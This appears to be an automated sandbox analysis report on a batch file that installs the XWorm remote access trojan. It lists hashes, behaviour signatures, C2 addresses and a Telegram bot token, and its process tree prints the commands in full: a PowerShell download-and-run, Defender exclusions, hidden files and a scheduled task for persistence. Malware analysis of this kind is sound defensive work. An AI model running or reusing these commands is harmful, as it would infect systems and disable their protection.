Analysis

  • max time kernel
    146s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-01-2025 19:37

General

  • Target

    fmcth.bat

  • Size

    77KB

  • MD5

    468184814f843ccabfba6e4797b64dea

  • SHA1

    da23c44c7143e01c6084fd99f680926b553c3ba1

  • SHA256

    96cc09ef13054fe37778f15fa87202e727832895f9712f68a18618fcb5c24ef1

  • SHA512

    3c6cc618f4ecff6a46814fa7e1132ef06bbc306b58b692e25b355401fff6fec3cc6a5472d3376f39cefb23d9d85cd3d0138360d69a957c84884b4e79578ef541

  • SSDEEP

    1536:1ueBx7KjbtTZiK77VvRFf0bc7OMYIUuH4Rx+GwnPNm8ywUp5QjSdDmjnFllQZEqV:1uAx7KjbtTZiK77VvRFf0bc7OMYIUuH2

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:7703

147.185.221.25:7703

regarding-states.gl.at.ply.gg:7703

Attributes
  • Install_directory

    %AppData%

  • install_file

    ApplicationFrameHost.exe

  • telegram

    https://api.telegram.org/bot6353034618:AAHzEkRGIc7NNoV5QuVXoAVVOMmU4ikzPYc/sendMessage?chat_id=1735841155

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fmcth.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4460
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -window hidden -command ""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1192
    • C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      2⤵
        PID:216
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3760
      • C:\Windows\system32\attrib.exe
        attrib +h "MicrosoftAccount" /s /d
        2⤵
        • Views/modifies file attributes
        PID:3132
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://github.com/SchoolSigmaBoy/SchoolSigma/raw/main/SigmaBoy.exe' -OutFile MicrosoftAccount.exe"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5020
      • C:\ProgramData\Microsoft\Settings\Accounts\MicrosoftAccount.exe
        MicrosoftAccount.exe
        2⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Settings\Accounts\MicrosoftAccount.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4644
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftAccount.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1712
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ApplicationFrameHost.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1940
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ApplicationFrameHost" /tr "C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe"
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4612
      • C:\Windows\system32\attrib.exe
        attrib +h "C:\ProgramData\Microsoft\Settings\Accounts\MicrosoftAccount.exe" /s /d
        2⤵
        • Views/modifies file attributes
        PID:4896
    • C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3760
    • C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2332

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\Microsoft\Settings\Accounts\MicrosoftAccount.exe

      Filesize

      69KB

      MD5

      60efdd9e1cf39dd0a3a7fbdeb6a2d391

      SHA1

      29dbc62cedd344c115047fcec30f83e81c6d794c

      SHA256

      5ad2e8363c51cc2392e5ea5c34fd426d585c118a1010cd034ccca53cb9aea8b0

      SHA512

      c070114f7bbc384b5362111a70f1a910ecbf08b909d9e7b4222c904c221a107494e38840f5bc443faee8822281c5d46d65c7970003b7b625e7d1488ce6d58b84

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ApplicationFrameHost.exe.log

      Filesize

      654B

      MD5

      2ff39f6c7249774be85fd60a8f9a245e

      SHA1

      684ff36b31aedc1e587c8496c02722c6698c1c4e

      SHA256

      e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

      SHA512

      1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      a6c9d692ed2826ecb12c09356e69cc09

      SHA1

      def728a6138cf083d8a7c61337f3c9dade41a37f

      SHA256

      a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

      SHA512

      2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      96ff1ee586a153b4e7ce8661cabc0442

      SHA1

      140d4ff1840cb40601489f3826954386af612136

      SHA256

      0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

      SHA512

      3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      c8fb57c34462baffeeecca3f847a94b0

      SHA1

      7f566ce7fff2e92e2b2cfb71308f4e41db91c1a5

      SHA256

      eaab89995b83126b9a118458e640a02bc4bacb88a43f9afac2858f033ded8008

      SHA512

      74d529444419a4399a3453919beb85b0c5f885641efdff4417628e806c8b795199effc124e017d28c64c94071aa0bf227fabf4b7e8dbcf18f3637623063b5329

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      8e4e462e64126355db69af06ba8f774e

      SHA1

      279d1d08ad530bf8a249366c5d927e1533f77f1a

      SHA256

      c263a08e8768e9038dc462db8782f66ce94230ce8a372d7320e8eb7f862a3f76

      SHA512

      92bd1d207d3f9d139e949e47f70d69ef1be8d40c11b03fd2bebb22bfeb598b6065921a1f3ec931e8a4d4dfdb8974a8405f17a1b3f54e4fc549fd8ea1dd5fb353

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      96e3b86880fedd5afc001d108732a3e5

      SHA1

      8fc17b39d744a9590a6d5897012da5e6757439a3

      SHA256

      c3077e4cadb4ed246c02abe55aa6cf832fee4c2546b7addb7d22cd1c7c8c1294

      SHA512

      909b1968f7204fa7029109b02232d8cc5438f6b4dc7c9044e4e47c59fcee538199b13029e36592b12ed573d48a308dd4822d2ced4129ab08d4111897e02be55d

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      dd1d0b083fedf44b482a028fb70b96e8

      SHA1

      dc9c027937c9f6d52268a1504cbae42a39c8d36a

      SHA256

      cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c

      SHA512

      96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a0e5o0r2.c2x.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1192-12-0x00007FFEF6F00000-0x00007FFEF79C1000-memory.dmp

      Filesize

      10.8MB

    • memory/1192-15-0x00007FFEF6F00000-0x00007FFEF79C1000-memory.dmp

      Filesize

      10.8MB

    • memory/1192-0-0x00007FFEF6F03000-0x00007FFEF6F05000-memory.dmp

      Filesize

      8KB

    • memory/1192-11-0x00007FFEF6F00000-0x00007FFEF79C1000-memory.dmp

      Filesize

      10.8MB

    • memory/1192-1-0x000001D0FD010000-0x000001D0FD032000-memory.dmp

      Filesize

      136KB

    • memory/3608-46-0x0000000000200000-0x0000000000218000-memory.dmp

      Filesize

      96KB

    • memory/3760-30-0x00007FFEF6F00000-0x00007FFEF79C1000-memory.dmp

      Filesize

      10.8MB

    • memory/3760-18-0x00007FFEF6F00000-0x00007FFEF79C1000-memory.dmp

      Filesize

      10.8MB

    • memory/3760-17-0x00007FFEF6F00000-0x00007FFEF79C1000-memory.dmp

      Filesize

      10.8MB